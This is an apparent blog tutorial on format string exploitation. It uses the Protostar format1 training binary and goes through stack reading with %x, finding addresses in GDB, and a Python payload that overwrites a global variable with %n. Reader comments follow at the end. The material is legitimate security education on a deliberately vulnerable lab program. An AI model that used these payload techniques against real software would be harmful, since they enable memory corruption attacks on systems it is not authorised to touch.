Format strings are a handy way for programmers to whip up a string from several variables. They are designed to save the programmer time and allow their code to look much cleaner. Unbeknownst to some programmers, format strings can also be used by an attacker to compromise their entire program. In this guide, we are going to look at just how we can use a format string to exploit a running program.
What Is a Format String?
As mentioned above, a format string is a neat method by which a programmer can structure a string that they either plan to print or store to a variable. In the C programming language, a format string looks something like this:
printf( "We have %d dogs", 2 );
And will output something like this:
We have 2 dogs
The secret ingredient in the format string is the format specifier. The format specifier is the %d in the command we just wrote. When the program sees a format specifier, it knows to expect a variable to replace that specifier. In this case, the variable was the integer 2. Here's another example:
char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1,person2,books);
Let's go line by line and walk through exactly what the program does.
On the first two lines, we define two strings, person1 and person2, and assign them the values of "Bob" and "Alice", respectively. On line three, we define an integer variable named books, and give it the value 15. Finally, on the last line, we print out a formatted string. In the string, we see two unique format specifiers, %s and %d. As you might have guessed, each one expects a different data type. The former expects a string, while the latter expects an integer. There are several other format specifiers as well. These include %x which expects a hexadecimal value and %c which expects a single character.
Now that we know how to use format strings, it's time to learn how to misuse them!
Taking Advantage of Vulnerable Functions
While format strings seem to merely be a different programming technique for concatenating variables and strings, this is not actually the case. Our example of format strings that we looked at above should raise one very important question: What happens when you have a format specifier in a string, but there is no variable included to replace that format specifier in the string? Let's hop back into the Protostar virtual machine to find out.
If you don't yet have Protostar installed, check out the installation guide in our first article on exploit development.
Once again, we will SSH into our virtual machine with the username user and the password user. Once we're logged in, it might be a good idea to type the following command.
bash
This will take us from our current shell program to a much more interactive shell program called Bash. This will make our command line experience much more smooth.
Once that is taken care of, we're going to jump right in and take a look at the format1 level. Let's move to the same directory as the format1 executable by typing:
cd /opt/protostar/bin
Now, before we recklessly fling ourselves at the challenge, let's take a look at the source code found on Exploit Exercises.
This source code might be a little intimidating for those unfamiliar with C programming, but I promise it's not that bad.
Going line-by-line, we first see a global integer named "target" being declared without a value. The fact that this variable is being declared globally instead of inside a function is very important. This changes where, in memory, the variable is stored.
Instead of being stored on the stack, the target variable will be stored in the uninitialized data or BSS section of the program. This means we won't be able to simply flood the stack with an ungodly amount of characters to alter the value of the target variable like we have done with stack overflow vulnerabilities in previous articles.
Continuing to look at the program, we see a function declared with the name "vuln." I wonder if this is where we will find the format string vulnerability ....
The first thing that happens in the vuln function is a call to the printf function. This call will print the contents of the variable named string. We first see reference to the string variable on line 8 when it is declared as a parameter for the vuln function. This means that when the vuln function is called, a string is passed as an argument and given the variable name "string" to be used in the function.
Next, we see an "if" statement. Essentially, the statement is saying "if the variable target holds any value besides zero, print the following string." From this if statement, we can gather that our objective is to somehow modify the target variable.
Finally, we can see down on line 17 the main function of the program. Inside the main function is a call to the vuln function we just looked at, with the value "argv[1]" passed as an argument. The variable "argv[1]" refers to the first command line argument given to the program when it is originally run. This is where we will be placing our exploit once it is finished.
For now, let's just try to answer the question we posed above: What happens when you have a format specifier with no variable to replace it with?
The Odd Truth
We can see from the above source code that whatever string we pass as a command-line argument to the program will be printed on line 10 with the call to the printf function. Knowing that, let's stop talking about it and see what actually happens if we pass a format specifier as that argument:
Well, that's ... strange. When we pass the %d format specifier, instead of printing "%d" or throwing an error like we might expect, we get some random integer. Where is that integer coming from? We could fire up GDB, the GNU debugger, and try to dig through the program to find it, but looking at memory in integer form is sort of messy. Maybe there's a way we can get this number in hexadecimal form.
Like we mentioned earlier, there's another format specifier that expects a hexadecimal value. Let's see what happens if we replace %d with %x as our argument:
Lo and behold, we get a value (highlighted in red above) that looks a lot like a hexadecimal value. Let's see if we can find this value somewhere in memory with the GDB debugger.
To start GDB and attach it to the format1 program, let's type the following.
gdb format1
Once GDB has started up, we need to set a breakpoint. Looking back at the source code, line 14 seems like a good choice. To set a breakpoint, we type:
break 14
Now we're all set to run the program. In GDB, you can run a program with command line arguments by using the run command with the command line arguments right after. In this case, we'll type:
run %x
This will run the program with %x as the argument. Once we run the program we should hit a breakpoint, as seen in the image below.
When we hit a break point, execution of the program is halted. From here, we can examine individual chunks of memory with the x command. Let's start by looking at the stack. To do this, we'll type:
x/32x $esp
The first x is short for "examine." This command allows us to examine memory, so the name is fitting. The /32 specifies that we want to examine the next 32 four-byte segments. The final x at the very end tells GDB that we want to view this section of memory in hexadecimal format. The last term $esp tells the command to start looking at memory at the very beginning of the current stack frame. Let's see what output we get from this command.
Now we can see a ton of data from the stack, but one section should stick out to us: That same hexadecimal value that was printed earlier is sitting on the stack!
We finally have the answer to our question. When a format specifier doesn't have a corresponding variable to replace it, the program will simply grab the value in memory at the location where it would have expected the corresponding variable to be. When we have a program that improperly allows a user to print a string containing a format specifier, an attacker gains the ability to read data right from memory.
Going from Reading Data to Writing Data
While reading data we shouldn't be able to is interesting, writing data that we shouldn't be able to write is way more fun. With this fun comes complication, however, so hold onto your keyboards and get ready.
There is one more format specifier we have yet to talk about. This specifier is %n. While every other format specifier is focused on reading a particular type of data, %n is focused on writing data. Specifically, %n will write the length of the format string up to that point to the address of a variable. The important thing to note here is that the %n format specifier expects the address of a variable, not the variable itself.
Well, wait a minute! If the program we're looking at will automatically grab an address to read from for the other format specifiers, will it automatically grab an address to write to for the %n specifier? Absolutely it will.
Getting to Where We Want to Be
In order for us to overwrite the target variable, we're going to need to write its address to memory and then set up %n to write to that address. In order to do that, we first need to know where our original input is on the stack.
Step 1: Finding Where We Are Starting From
In order to find where the string variable is located, let's restart the program in GDB. This time, we're going to type the following command.
run AAAA.%x.%x
Once again, we will hit the breakpoint, and we can start digging. To find the location of the string address, we'll type the following.
p string
In this command, p is short for print. This command will print whatever variable we pass to it, along with the location of that variable. Our output should look something like this:
From this output, we can gather that the string variable is located at 0xbffff987. If we examine the memory at that location, we will, in fact, find the hexadecimal representation of the four As we typed at the beginning of our input.
Here's the trick: This memory address (0xbffff987) is higher than the memory address of the data we read using the format specifier. This means that if we provided a string with enough format specifiers, we would continue to climb up the memory addresses until we end up returning to the beginning of our string. If we do the math, we can find out just how many format strings we would need to do that:
By subtracting the address of the data on the stack from the starting address of the string variable, we can see that the two are 547 bytes away. By rounding that up to 548 and dividing by four, we can see we will need roughly 137 format specifiers to return to our original string. This sounds like a job for a Python script.
Step 2: Writing a Skeleton for Our Exploit
Let's exit out of GDB and type the following command to return to our home directory.
Short and sweet. Once we're home, let's use the Nano text editor to open up a new text document.
nano exploit.py
Once we're in Nano, let's type up a skeleton exploit:
Going through the code, the first line tells the Bash shell that when it tries to execute this file, it should use the Python compiler. The next two lines import modules that we'll need for the exploit. The "os" module will allow us to make a system call to run the format1 program. The struct module will come in handy when it comes to writing memory addresses later on.
Line four creates an absolute whale of a string variable named payload. Inside that variable, we will be storing four As along with 137 format specifiers. It's very important to note the periods that are placed within the string. Depending on how long or short the payload is, the format string will grab data from memory in chunks that differ slightly. We need to make sure that all four of our As stay in the same section of memory that will be read by a single format specifier. When practicing on your own, you'll just have to play around with the length of the string until you find a combination that works.
Once we're done writing the skeleton script, we can save it and run it. Running our exploit skeleton yields the following output:
Because we supplied 137 format specifiers, we got 137 four-byte chunks of memory. This includes the memory we were looking at in GDB earlier.
Looking at the output, we can see our four As (highlighted in red). We seem to have overestimated how many format specifiers we needed though. This is most likely because the structure of a program's memory is slightly different when running in GDB instead of by itself. Editing our exploit so we only supply 132 format specifiers instead of 137 should put us exactly where we want to be:
Perfect. From here we can see the light at the end of the tunnel. The glory of exploitation is almost upon us, but there is one more step.
Step 3: Locating & Overwriting the Target Variable
We need to hop back into GDB one more time to get an important piece of information. We're going to replace the four As at the beginning of our payload string with the address of the target variable. That way, we can substitute the last %x modifier for a %n modifier which will read the address of target and overwrite it with the length of the string. In order to get the address of the target, we must type the following into GDB.
p &target
The & in front of the variable name tells GDB that we want the address of the variable, not the value of the variable itself. Running that command yields the following result:
Now, all we have to do is slap that bad boy into our program and we should be good to go. Our final exploit should look like this now:
There were two changes made: First, we added a new variable called "address." This will hold the address of the target variable. We use the struct.pack function in order to store the address in a format that the format1 program will interpret correctly.
The second change comes when we are creating the payload variable. Instead of starting the string with four As, we start with the address variable now. We make sure to include the period afterward to make sure the address aligns with where the format specifiers are reading from. We also print one less %x format specifier and instead print a %n format specifier in its place. This is done so that the %n format specifier will read the address we wrote at the beginning of the string and overwrite the data at that address. In this case, that address will (hopefully!) be the address of the target variable.
Step 4: Basking in Our Success
Once we've made the necessary changes to the program, let's see what happens when we run it:
The program confirms that we hit the target variable perfectly and overwrote its data with our own. Sweet victory.
Thank you for reading! Format string exploitation is a bit of a monster to understand at first, and while these vulnerabilities don't often appear in the wild anymore, they are really great at helping you better understand what is actually going on behind the scenes of a program. Comment below with any questions or contact me via Twitter @xAllegiance.
Just updated your iPhone? You'll find new features for TV, Messages, News, and Shortcuts, as well as important bug fixes and security patches. Find out what's new and changed on your iPhone with the iOS 17.6 update.
3 Comments
Helllo.
At the end in step 1, "By subtracting the address of the data on the stack from the starting address of the string variable" where do you get the "0xbffff764" memory address to make the calcs? I cant realize where it comes from and I cant make the right calcs, where do I find that "starting address of the string variable"? . However I made the calcs according to what I thought was right(I think i failed btw).
When I execute the second exploit.py built, it shows an error that says "Segmentation fault" and I have at least 2 hours trying to figure out how make it works and I dont get anyting yet hehe.
PD: Sorry for my bad english, am still learning..
Step one is just an approximation. The idea is that you are trying to figure out how many format specifiers you need in order to get the format specifiers to read from memory that you control. "0xbffff764" is an address close to where the format specifiers start reading from. I think the actual first address that is read from is 0xbffff774 in this example but I moved 10 bytes earlier so that I would overestimate instead of underestimate in case the number of format specifiers needed changed during execution outside of the GDB debugger.
Got it. Thank u!
Share Your Thoughts